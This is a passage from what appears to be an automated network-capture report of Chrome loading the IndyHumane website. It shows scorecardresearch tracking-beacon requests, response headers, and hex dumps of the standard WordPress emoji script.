                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 08 60 cb 37 6e e5 dd 6f e7 32 6b f1 4a b6 ec d9 af 3a 8e f0 2f 3f 00 a7 3b 6d b9 55 aa 83 88 c0 63 9c 3a 75 aa ea 0c 22 c0 68 16 6b 34 ae 33 ce 07 ab ce e2 4d 96 6f dc 8a d1 60 a0 47 bb 96 98 8c 46 dd c7 6f 92 92 48 69 45 25 8b d7 6e d2 7d 6c 11 58 ca ab aa 59 bb 6d 17 9d 72 b2 c9 4c 49 54 1d 47 08 11 a0 d2 12 e3 19 d9 a7 1b 1d 73 b2 08 09 36 73 a8 a8 84 b2 4a a9 a7 84 2e 9a 03 03 a7 4d 9f 31 73 ea e4 71 32 b3 21 3c 4a 66 d0 85 47 69 16 6b 02 f0 3d d0 55 75 16 6f 14 1d 11 ce e3 d7 5e cc c5 63 86 63 30 e8 df cc 3e ef 70 11 c3 a6 dc c5 86 9d 7b 75 1f 5b 04 9e 9e ed 5b f1 d6 bd d7 e9 d2 27 41 08 21 4e d4 37 0b 6d cc 9c bb 84 af 7e fe 85 c3 25 65 aa e3 08 ff b0 0a 38 d9 69 cb cd 57 1d 44 04 0e 29 d0 85 c7 68 16 6b 3a f0 23 d0 46 75 16 6f 96 91 94 c0 4b b7 4d
                                                                                                                                                                                                                                                        Data Ascii: `7no2kJ:/?;mUc:u"hk43Mo`GFoHiE%n}lXYmrLITGs6sJ.M1sq2!<JfGik=Uuo^cc0>p{u[['A!N7m~%e8iWD)hk:#FuoKM
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 3b f2 d1 d8 f8 63 26 a3 11 73 90 89 20 93 89 f0 d0 60 a2 c2 c3 88 0a 0f 23 32 3c 94 c8 b0 50 a2 c2 c3 88 8d 8a 20 31 26 9a b8 e8 08 12 62 a2 89 8f 8e 24 32 2c d4 03 7f ca 42 78 c6 c6 9d 7b f9 64 f6 22 ee 9b 3e 83 06 87 43 75 1c e1 1b 4a 81 a1 4e 5b ee 0a d5 41 84 6f 93 02 5d 9c 10 cd 62 ed 04 cc 41 96 b5 7b d4 73 37 5f c6 65 67 9c ac db d1 6b 4e a7 93 cf e7 2d e1 cc 5b 1e d6 65 3c 21 7e 13 13 19 ce f7 cf dd 47 8f 76 2d 55 47 39 6e b5 75 f5 1c 2a 2a e1 60 61 f1 91 d7 a1 c2 12 f2 1a 3f 1e 2e 29 a3 ba d6 35 03 5e 67 b7 53 57 6f a7 de 6e a7 de de 40 5d 7d fd 91 1f af b7 db 71 38 7c f3 3d f7 b7 42 3e c8 64 22 c8 e4 fa 18 62 0e c2 1c 14 84 39 c8 44 70 e3 c7 10 b3 99 98 c8 70 12 63 a3 48 89 8f 25 35 21 8e b4 c4 38 52 e3 e3 48 4d 70 7d df 1c a4 ef 91 91 42 b8 4b
                                                                                                                                                                                                                                                        Data Ascii: ;c&s `#2<P 1&b$2,Bx{d">CuJN[Ao]bA{s7_egkN-[e<!~Gv-UG9nu**`a?.)5^gSWon@]}q8|=B>d"b9DppcH%5!8RHMp}BK
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: e5 ee 05 aa c3 08 ef 26 05 ba f8 57 9a c5 1a 0d e4 02 ed 54 67 11 42 f8 87 1f 96 ae e2 a9 0f be 24 2a 3c ec c8 2c 79 de e1 e2 23 67 87 db 1b 1a 90 06 a6 c2 1d 1a 1c 0e 1a 7e b7 44 fe 70 49 19 6b b7 ee e2 dd 6f e7 10 64 32 91 1c 17 43 ef 8e ad 19 d0 a5 3d fd bb b4 a5 65 66 ba e2 c4 c2 57 04 9b 83 e8 d5 be 15 5f 3f 7d 0f 2f 7f f6 1d 53 5f 9d 21 27 41 88 3f 6b 0b 7c ad 59 ac 23 9c b6 dc 52 d5 61 84 f7 92 2e ee e2 1f 69 16 6b 08 f0 0d 30 44 75 16 3d 9c 31 b8 0f cf dd 7c 19 69 89 72 ce 6e a0 b8 e9 99 37 78 e2 bd cf 55 c7 10 7f c3 1c 64 42 d3 34 ec f6 06 99 1d 17 5e c5 68 30 60 32 19 31 1a 0c c4 47 47 d2 af 73 5b 06 77 ef c8 90 ee 1d ff 73 6b 86 10 00 f5 76 3b 6b b6 ee e4 fa 27 5f 63 e1 ea 0d aa e3 08 ef 33 07 18 ed b4 e5 56 ab 0e 22 bc 93 cc a0 8b bf a5 59 ac
                                                                                                                                                                                                                                                        Data Ascii: &WTgB$*<,y#g~DpIkod2C=efW_?}/S_!'A?k|Y#Ra.ik0Du=1|irn7xUdB4^h0`21GGs[wskv;k'_c3V"Y
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 7b 58 5f 5a 66 a6 93 96 18 27 4d c6 fc d0 fc 95 eb b9 f3 c5 77 58 bc 76 93 34 0f 0c 5c 5f 01 67 38 6d b9 b2 74 26 80 98 54 07 10 1e f7 1c 01 58 9c 03 14 96 96 53 58 5a ae eb 98 06 83 46 9f 8e 6d b8 ed c2 b3 4e 78 ac 94 f8 58 1c 0e 07 b6 0d 5b 75 48 e6 5e 71 51 91 c4 44 84 eb 36 5e 51 59 05 cf 7e 98 4b bd dd ae db 98 42 08 e1 af ca 2a ab 78 e3 ab 1f 79 e3 ab 1f e9 94 93 cd d8 e1 fd 18 d6 a3 33 4d 53 93 48 8e 8b 51 1d 4f e8 64 60 d7 f6 7c f5 e4 dd 5c ff e4 6b 7c 3a 7b 91 f4 22 08 4c 63 70 dd bb 4f 51 1d 44 78 8e ec 41 0f 20 9a c5 7a 1b 70 85 ea 1c fe c4 e1 70 f2 dd e2 15 ba 8d 77 ce f0 fe 34 4d 4d d2 6d 3c 77 39 73 48 1f 3a b4 c8 d2 65 2c 87 c3 c9 bc 15 eb a4 38 17 42 88 e3 b0 66 eb 4e ee 7c f1 5d 7a 5d 74 13 d7 3e fe 2a 9f ce 5e c4 96 3d fb e5 6b aa 9f 88
                                                                                                                                                                                                                                                        Data Ascii: {X_Zf'MwXv4\_g8mt&TXSXZFmNxX[uH^qQD6^QY~KB*xy3MSHQOd`|\k|:{"LcpOQDxA zppw4MMm<w9sH:e,8BfN|]z]t>*^=k


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        88192.168.2.44984918.244.18.384432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC768OUTGET /b?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952098&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9= HTTP/1.1
                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC816INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                        Location: /b2?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952098&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9=
                                                                                                                                                                                                                                                        set-cookie: UID=10Eb84084683af8249c0c7e1736387955; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                        set-cookie: XID=10Eb84084683af8249c0c7e1736387955; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                        Via: 1.1 39cfa117a3536e9c0afd90708900b558.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                        X-Amz-Cf-Id: 0BAG0I5DYYQstLXcuSiShpaR1xT23oleUQG-SbKs1taiDI633dPGKQ==


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        89192.168.2.44985018.244.18.384432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC768OUTGET /b?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952107&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9= HTTP/1.1
                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC816INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                        Location: /b2?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952107&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9=
                                                                                                                                                                                                                                                        set-cookie: UID=1287479d2ea4f533b1a92731736387955; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                        set-cookie: XID=1287479d2ea4f533b1a92731736387955; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                        Via: 1.1 92818640c38efb006e1c39f31234144c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                        X-Amz-Cf-Id: 68XqpCEDKMWB1FFRh-trIiXdPnugNd8untZlF4xQxL4UaHjrbNkkCQ==


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        90192.168.2.449858199.16.172.264432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC690OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: indyhumane.org
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: _ga_CDQ7BLPKF7=GS1.1.1736387952.1.0.1736387952.0.0.0; _ga=GA1.1.932040568.1736387953; _gcl_au=1.1.1223850198.1736387954
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC519INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:15 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 18726
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                        Last-Modified: Thu, 27 Jun 2024 12:55:22 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        ETag: "667d613a-4926"
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca BYPASS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC850INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65 6d 6f 6a 69 40 31 35 2e 30 2e 33 2f 61 73 73 65 74 73 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:funct
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 4f 66 28 22 20 22 2b 66 2b 22 3d 22 29 26 26 28 63 3d 63 2e 63 6f 6e 63 61 74 28 22 20 22 2c 66 2c 27 3d 22 27 2c 75 5b 66 5d 2e 72 65 70 6c 61 63 65 28 74 2c 72 29 2c 27 22 27 29 29 3b 63 3d 63 2e 63 6f 6e 63 61 74 28 22 2f 3e 22 29 7d 72 65 74 75 72 6e 20 63 7d 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 75 29 7b 76 61 72 20 66 2c 63 2c 65 2c 62 2c 61 2c 74 2c 72 2c 6e 2c 6f 2c 73 2c 69 2c 6c 3d 66 75 6e 63 74 69 6f 6e 20 64 28 75 2c 66 29 7b 76 61 72 20 63 2c 65 2c 62 3d 75 2e 63 68 69 6c 64 4e 6f 64 65 73 2c 61 3d 62 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 61 2d 2d 3b 29 63 3d 62 5b 61 5d 2c 33 3d 3d 3d 28 65 3d 63 2e 6e 6f 64 65 54 79 70 65 29 3f 66 2e 70 75 73 68 28 63 29 3a 31 21 3d 3d 65 7c 7c 22 6f 77 6e 65 72 53 56 47 45 6c 65 6d 65 6e 74 22 69 6e
                                                                                                                                                                                                                                                        Data Ascii: Of(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a],3===(e=c.nodeType)?f.push(c):1!==e||"ownerSVGElement"in
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 36 38 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30
                                                                                                                                                                                                                                                        Data Ascii: 68\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffc\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffd\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37
                                                                                                                                                                                                                                                        Data Ascii: ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc69\ud83c[\udffb-\udfff]|\ud83e\uddd1\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83e\uddd1\ud83c[\udffc-\udfff]|\ud83e\uddd1\ud83c\udffc\u200d\u27
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 65 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c
                                                                                                                                                                                                                                                        Data Ascii: 0d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udfff\u200d\ud83e\udd1d\u200d\ud83d\udc68\ud83c[\udffb-\udffe]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 65 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63
                                                                                                                                                                                                                                                        Data Ascii: dffb-\udffd\udfff]|\ud83d\udc69\ud83c\udffe\u200d\ud83e\udd1d\u200d\ud83d\udc69\ud83c[\udffb-\udffd\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 64 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 63 5c 75 64 66 66 65 5c 75 64
                                                                                                                                                                                                                                                        Data Ascii: \ufe0f\u200d\ud83d\udc8b\u200d\ud83d[\udc68\udc69]|\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c[\udffc-\udfff]|\ud83e\udef1\ud83c\udffc\u200d\ud83e\udef2\ud83c[\udffb\udffd-\udfff]|\ud83e\udef1\ud83c\udffd\u200d\ud83e\udef2\ud83c[\udffb\udffc\udffe\ud
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 64 64 63 64 2d 5c 75 64 64 63 66 5c 75 64 64 64 34 5c 75 64 64 64 36 2d 5c 75 64 64 64 64 5d 29 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 29 3f 5c 75 32 30 30 64 5b 5c 75 32 36 34 30 5c 75 32 36 34 32 5d 5c 75 66 65 30 66 7c 28 3f 3a 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 37 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 36 5c 75 64 63 36 37 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c
                                                                                                                                                                                                                                                        Data Ascii: ddcd-\uddcf\uddd4\uddd6-\udddd])(?:\ud83c[\udffb-\udfff])?\u200d[\u2640\u2642]\ufe0f|(?:\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc66\u200d\ud83d\udc66|\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc67\u200d\ud83d[\udc66\udc67]|\ud83d\udc68\u200d\ud83d\
                                                                                                                                                                                                                                                        2025-01-09 01:59:15 UTC1369INData Raw: 33 64 5c 75 64 65 33 35 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 61 62 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 64 5c 75 64 63 30 38 5c 75 32 30 30 64 5c 75 32 62 31 62 7c 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30
